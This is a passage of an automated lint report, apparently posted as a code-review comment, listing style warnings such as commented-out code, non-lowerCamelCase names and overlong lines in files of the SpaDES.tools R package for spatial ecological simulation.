cumsum(getValues(probinit)[nonNAs])\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:365:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L365) *style:* **Commented code should be removed.**\n```r\n​#         ran <- runif(numagents,0,1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:366:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L366) *style:* **Commented code should be removed.**\n```r\n​#         fI <- findInterval(ran, ProbInit.v)+1\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:367:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L367) *style:* **Commented code should be removed.**\n```r\n​#         fI2 <- wh.nonNAs[fI]\n          ^~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:368:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L368) *style:* **Commented code should be removed.**\n```r\n​#         last.ran <- runif(numagents,0,1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:369:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L369) *style:* **Commented code should be removed.**\n```r\n​#         last.fI <- findInterval(last.ran, ProbInit.v)+1\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:370:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L370) *style:* **Commented code should be removed.**\n```r\n​#         last.fI2 <- wh.nonNAs[last.fI]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:372:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L372) *style:* **Commented code should be removed.**\n```r\n​#         #                va <- getvalue(probinit)[nonNAs]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:373:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L373) *style:* **Commented code should be removed.**\n```r\n​#         va <- getValues(probinit)[nonNAs]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:374:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L374) *style:* **Commented code should be removed.**\n```r\n​#         ran <- runif(length(va), 0, 1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:375:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L375) *style:* **Commented code should be removed.**\n```r\n​#         fI2 <- wh.nonNAs[ran<va]\n          ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:377:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L377) *style:* **Commented code should be removed.**\n```r\n​#         last.ran <- runif(length(fI2), 0, 1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:378:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L378) *style:* **Commented code should be removed.**\n```r\n​#         last.fI <- findInterval(last.ran, ProbInit.v) + 1\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:379:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L379) *style:* **Commented code should be removed.**\n```r\n​#         last.fI2 <- wh.nonNAs[last.fI]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:381:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L381) *style:* **Commented code should be removed.**\n```r\n​#         #                last.ran <- runif(length(fI2),0,1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:382:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L382) *style:* **Commented code should be removed.**\n```r\n​#         #                last.fI2 <- wh.nonNAs[last.ran<va]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:385:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L385) *style:* **Commented code should be removed.**\n```r\n​#         position <- xyFromCell(agentlocation,fI2,spatial = TRUE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:387:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L387) *style:* **Commented code should be removed.**\n```r\n​#         position <- coordinates(agentlocation)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:389:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L389) *style:* **Commented code should be removed.**\n```r\n​#         stop(\"need raster layer or Spatial Points object\")\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:391:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L391) *style:* **Commented code should be removed.**\n```r\n​#       numagents <- length(position)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:399:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L399) *style:* **Commented code should be removed.**\n```r\n​#           colnames(xy) = c(\"x\", \"y\")\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:400:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L400) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(xy)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:401:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L401) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(sampleRandom(agentlocation, numagents, xy = TRUE, sp = TRUE))\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:403:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L403) *style:* **Commented code should be removed.**\n```r\n​#           sam <- sample(1:length(agentlocation),numagents)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:404:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L404) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(agentlocation[sam,])\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:406:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L406) *style:* **Commented code should be removed.**\n```r\n​#           stop(\"need raster layer or Spatial Points object\")\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:413:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L413) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(agentlocation)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:415:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L415) *style:* **Commented code should be removed.**\n```r\n​#           stop(\"need raster layer or Spatial Points object\")\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:417:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L417) *style:* **Commented code should be removed.**\n```r\n​#         numagents <- length(position)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:425:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L425) *style:* **Commented code should be removed.**\n```r\n​#         numagents <- length(position)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:429:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L429) *style:* **Commented code should be removed.**\n```r\n​#     stop(\"Need to provide agentlocation, which can be a map layer\")\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:431:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L431) *style:* **Commented code should be removed.**\n```r\n​#   heading1 <- runif(numagents, 0, 360)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:432:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L432) *style:* **Commented code should be removed.**\n```r\n​#   distance <- runif(numagents, 0.1, 10)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:434:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L434) *style:* **Commented code should be removed.**\n```r\n​#   .Object@ID <- as.character(1:numagents)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:435:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L435) *style:* **Commented code should be removed.**\n```r\n​#   .Object@spatial <- position\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:436:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L436) *style:* **Commented code should be removed.**\n```r\n​#   .Object@heading <- heading1\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:437:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L437) *style:* **Commented code should be removed.**\n```r\n​#   .Object@distance <- distance\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:439:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L439) *style:* **Commented code should be removed.**\n```r\n​#   return(.Object)\n    ^~~~~~~~~~~~~~~\n```\n[R/mapReduce.R:53:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/mapReduce.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  BsumVec <- reduced[fullRasterVals] # join\n  ^~~~~~~\n```\n[R/neighbourhood.R:112:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/neighbourhood.R#L112) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​adj.raw <- function(x = NULL, cells, directions = 8, sort = FALSE, pairs = TRUE,\n^~~~~~~\n```\n[R/neighbourhood.R:114:21:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/neighbourhood.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                    match.adjacent = FALSE, cutoff.for.data.table = 2e3,\n                    ^~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:114:45:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/neighbourhood.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                    match.adjacent = FALSE, cutoff.for.data.table = 2e3,\n                                            ^~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:233:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/neighbourhood.R#L233) *style:* **Lines should not be more than 100 characters.**\n```r\n​              ((adj[, \"from\"] %% numCol + adj[, \"to\"] %% numCol) == 1)) # | #right & left edge cells, with neighbours wrapped\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:238:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/neighbourhood.R#L238) *style:* **Lines should not be more than 100 characters.**\n```r\n​              ((adj[, \"from\"] %% numCol + adj[, \"to\"] %% numCol) == 1)) # | #right & left edge cells, with neighbours wrapped\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:297:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/neighbourhood.R#L297) *style:* **Lines should not be more than 100 characters.**\n```r\n​              ((from %% numCol + to %% numCol) == 1))# | #right & left edge cells, with neighbours wrapped\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:813:29:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/neighbourhood.R#L813) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​setGeneric(\"wrap\", function(X, bounds, withHeading) {\n                            ^\n```\n[R/neighbourhood.R:822:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/neighbourhood.R#L822) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:839:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/neighbourhood.R#L839) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:849:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/neighbourhood.R#L849) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:850:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/neighbourhood.R#L850) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    X <- wrap(X, bounds = extent(bounds))\n    ^\n```\n[R/neighbourhood.R:859:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/neighbourhood.R#L859) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:860:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/neighbourhood.R#L860) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    X <- wrap(X, bounds = extent(bounds))\n    ^\n```\n[R/neighbourhood.R:869:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/neighbourhood.R#L869) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:872:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/neighbourhood.R#L872) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      X <- wrap(X, bounds = extent(bounds))\n      ^\n```\n[R/neighbourhood.R:884:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/neighbourhood.R#L884) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds, withHeading) {\n                        ^\n```\n[R/neighbourhood.R:909:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/neighbourhood.R#L909) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds, withHeading) {\n                        ^\n```\n[R/neighbourhood.R:910:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/neighbourhood.R#L910) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      X <- wrap(X, bounds = extent(bounds), withHeading = withHeading)\n      ^\n```\n[R/neighbourhood.R:919:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/neighbourhood.R#L919) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds, withHeading) {\n                        ^\n```\n[R/neighbourhood.R:922:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/neighbourhood.R#L922) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      X <- wrap(X, bounds = extent(bounds), withHeading = withHeading)\n      ^\n```\n[R/neighbourhood.R:1059:40:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/neighbourhood.R#L1059) *style:* **Commas should always have a space after.**\n```r\n​  cc <- cbind(pureCircle2[, \"x\"] - xy[,\"x\"], pureCircle2[, \"y\"] - xy[, \"y\"])\n                                       ^\n```\n[R/probability.R:41:35:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/probability.R#L41) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    1 / sqrt(var * 2 * pi) * exp(-((theta - mu + 2 * pi * k) ^ 2) / (2 * var))\n                                  ^\n```\n[R/probability.R:44:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/probability.R#L44) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Next <- term(theta, mu, var, k)\n  ^~~~\n```\n[R/probability.R:45:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/probability.R#L45) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Last <- Next\n  ^~~~\n```\n[R/RcppExports.R:68:20:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/RcppExports.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​runifC <- function(N) {\n                   ^\n```\n[R/RcppExports.R:71:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/RcppExports.R#L71) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/SELES.R:53:23:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/SELES.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​numAgents <- function(N, probInit) {\n                      ^\n```\n[R/splitRaster.R:116:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/splitRaster.R#L116) *style:* **Lines should not be more than 100 characters.**\n```r\n​      clusterApplyLB(cl = cl, x = seq_along(extents), fun = croppy, e = extents, r = r, path = path, rType = rType)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:538:8:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/spread.R#L538) *style:* **Commented code should be removed.**\n```r\n​      #isNASpreadProb <- is.na(spreadProb[])\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:540:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/spread.R#L540) *style:* **Commented code should be removed.**\n```r\n​      #   isNASpreadProb <- is.na(spreadProb[])\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:541:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/spread.R#L541) *style:* **Commented code should be removed.**\n```r\n​      #   spreadProb[isNASpreadProb] <- 0L\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:942:41:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/spread.R#L942) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​              notDupsEvents <- notDups[-(1:(nrSpreads - nrPotentials))]\n                                        ^\n```\n[R/spread2.R:5:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/spread2.R#L5) *style:* **Lines should not be more than 100 characters.**\n```r\n​                           \"quantityAdj\", \"quantityAdj2\", \"state\", \"size\", \"tooBigByNCells\", \"V1\", \"proportion\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:674:12:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/spread2.R#L674) *style:* **Commented code should be removed.**\n```r\n​          #pureCircle <- unique(pureCircle)\n           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:759:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/spread2.R#L759) *style:* **Commented code should be removed.**\n```r\n​          # colnamesDtPot <- colnames(dtPotential)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:760:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/spread2.R#L760) *style:* **Commented code should be removed.**\n```r\n​          # ll <-  lapply(colnamesDtPot, function(x) dtPotential[[x]][!spreadProbNA])\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:761:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/spread2.R#L761) *style:* **Commented code should be removed.**\n```r\n​          # names(ll) <- colnamesDtPot\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:762:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/spread2.R#L762) *style:* **Commented code should be removed.**\n```r\n​          # dtPotential <- as.data.table(ll)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:772:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/spread2.R#L772) *style:* **Lines should not be more than 100 characters.**\n```r\n​                                                                   .I[sample.int(length(numNeighs), size = numNeighs, prob = spreadProbRel)],\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:787:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/spread2.R#L787) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      NAaSP <- !is.na(actualSpreadProb)\n      ^~~~~\n```\n[R/spread2.R:789:42:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/spread2.R#L789) *style:* **Commas should always have a space after.**\n```r\n​        dtPotential <- dtPotential[NAaSP,]\n                                         ^\n```\n[R/spread2.R:830:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/spread2.R#L830) *style:* **Lines should not be more than 100 characters.**\n```r\n​        # this is to prevent overlap within an event... in some cases, overlap within event is desired, so skip this block\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:848:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/spread2.R#L848) *style:* **Lines should not be more than 100 characters.**\n```r\n​        #successCells <- na.omit(successCells[!dupsWithinDtPotential]) # remove the dupsWithinDtPotential\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:848:10:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/spread2.R#L848) *style:* **Commented code should be removed.**\n```r\n​        #successCells <- na.omit(successCells[!dupsWithinDtPotential]) # remove the dupsWithinDtPotential\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-examples.R:6:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-examples.R#L6) *style:* **Commented code should be removed.**\n```r\n​    cat(\"#START##############\\n\", file = tmpExFile, append = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-examples.R:17:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-examples.R#L17) *style:* **Commas should never have a space before.**\n```r\n​  } , add = TRUE)\n   ~^\n```\n[tests/testthat/test-mapReduce.R:23:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L23) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(sort(unique(getValues(biomass))), sort(reducedDT$biomass))\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:27:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/tests/testthat/test-mapReduce.R#L27) *style:* **Commented code should be removed.**\n```r\n​#   library(data.table)\n    